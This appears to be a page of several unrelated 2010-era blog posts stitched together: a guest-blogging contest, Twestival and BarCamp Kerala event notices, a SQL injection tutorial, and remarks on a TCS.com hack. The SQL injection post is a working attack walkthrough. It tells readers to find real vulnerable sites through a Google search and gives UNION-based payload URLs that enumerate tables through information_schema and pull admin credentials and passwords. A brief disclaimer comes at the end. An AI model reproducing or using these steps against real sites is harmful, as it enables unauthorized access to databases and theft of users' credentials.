It’s Feburary, the month of romance. It’s the shortest month of the year, but yet you end up in spending the most. Yes, everyone wish to make their valentine happy at this month and no one wants money to hinder their way in seeing their lover with a smile. Well, then hurry up. BlogEngage is running a $500 USD Guest-blogging contest. Just scribble out something on blogging with a true intention to enjoy the fun in a contest. Am sure, you will end up in writing a beautiful post. Still not ready to participate. Don’t just the opportunity let off. BlogEngage is a big platform for the bloggers and so I am sure all participants will see the feast.
So let’s meet the stunning sponsors who made this contest possible :::::
The Current Best of the Guest Blogger Sponsors
At last, but not the least. Ya, I know you people have guessed it. Yes, I am participating in this stunning contest. You can find my post at here
Cochin Twestival 2010 will be held on March 25th, 2010 from 5 PM to 8 PM at Somewhere Else Cafe. Cochin Twestival is a mega tweet-up with lots of things added.
Hearing the word ‘Twestival’ for the first time?
It is a mega tweet-up with lots of things added. In short, it is a Twitter Festival. Twitter Festivals or Twestivals happen all around the globe once a year. There are basically two types of Twestivals: Twestival Global & Twestival Local. Twestival Global is one day, one cause all around the world and Twestival Local takes place over a weekend where cities are encouraged to support a local cause. Both versions have international momentum, but the real power of Twestival is when everything comes together on one day, giving focus to an important cause, the cause being different every year.
Twestival Cochin 2010 will be held at Somewhere Else Cafe. A map to the location is available at Twitter Kerala
You can register for the event in the Facebook Event Page.
BarCamp Kerala 8 will be held on 28 March, 2010 at MACFAST, Thiruvala. BarCamp Kerala or BCK is the biggest and coolest techy event in Kerala.
Hearing the word ‘barcamp’ for the first time?
BarCamp is an ad-hoc gathering born from the desire for people to share and learn in an open environment. It is an intense event with discussions, demos and interaction from participants who are the main actors of the event
BCK 8 will be at MACFAST, Thiruvala. For more details, go here
You can register for the event in the BarCamp Kerala Site. As of yet we have 65 attendees.
BarCamp Kerala So Far…
If you are still undecided about coming to BarCamp Kerala, checkout these reports about the previous ones…
- First ever BarCamp in Kerala on November 24th, 2007
- BarCamp Kerala Part 5
- BarCamp Kerala 7 Live Blogging
- Barcamp Kerala LiveBlog
- BarCamp Kerala on May 3
First of all we must know what a ‘SQL injection’ is. So here is the wikipedia definition – ‘ SQL injection is a code injection technique that exploits a security vulnerability occuring in the database layer of an application ‘ . Here we will confine ourselves to SQL injections in web sites.
Now we need to find out a site link which is likely to be vulnerable and most probably it will be of the form ‘ http://www.site.com/abc.php?id=5 ‘. If you haven’t got such a link, just do a search in Google for ‘allinurl:.php?*id’ and take out a result.
1. Check the vulnerability by adding ‘ to the above link.
If you get an error message it means that the site is vulnerable to SQL injection.
Now you can be damn sure that the site is vulnerable to SQL injection.
2. Find out the number of columns
To find number of columns we use statement ORDER BY
Just increment the number until we get an error.
http://www.site.com/abc.php?id=5 order by 1– <– no error
http://www.site.com/abc.php?id=5 order by 2– <– no error
http://www.site.com/abc.php?id=5 order by 3– <– no error
http://www.site.com/abc.php?id=5 order by 4– <– ERROR ( we get some message like Unknown column ‘4’ )
So we can conclude that the table have 4 columns
3. Check whether UNION function works or not
http://www.site.com/abc.php?id=5 union all select 1,2,3–
We will get a number on the screen. Lets say we get the number 2 at this step.
4. Check for MySQL version by replacing 2 in the above step by version()
http://www.site.com/abc.php?id=5 union all select 1,version(),3–
Now you can find the version from the site and only if it is found to above 5, we can continue to the next steps.
// If the version is lower than 5, then we will have to a adopt some new methods which I will explain in some future post //
5. Use information_schema
Why do we use information_schema? The reason is very simple – ‘In mySQL 5 and higher versions, information_schema holds all tables and columns in the database’.
To get tables we use table_name and information_schema.tables
http://www.site.com/abc.php?id=5 union all select 1,table_name,3 from information_schema.tables–
6. Now that we have the column and table names, just retrieve the sensitive data like admin, user, passwords, etc.
//PLEASE DONT USE THE INFORMATION PROVIDED IN THIS POST FOR CRACKING PURPOSES
TCS.com belonging to Tata Consulatcny Services was hacked earlier todaya and it is claimed to be a attack over a DNS loophole.
Using nslookup, the diiference between Google public DNS and open DNS were studied.
On using nslookup for openDNS the result for both tcs.com and http://www.tcs.com were the same.
On using nslookup for Google public DNS the result for both tcs.com and http://www.tcs.com were different.
For http://www.tcs.com the Address was 188.8.131.52 while for tcs.com it was 184.108.40.206.
Thanks to Albins for pointing out the difference.
The website http://www.tcs.com which belongs to India’s IT giant Tata Consultancy Services gets hacked by a French hacker. When I write this post, the TCS group have not still resolved the problem. Itx more likely that it is not a web software hack,but an attack through DNS loophole.
If you visit TCS.com you will get a screenshot as shown below, telling that they have put up the domain name for sale.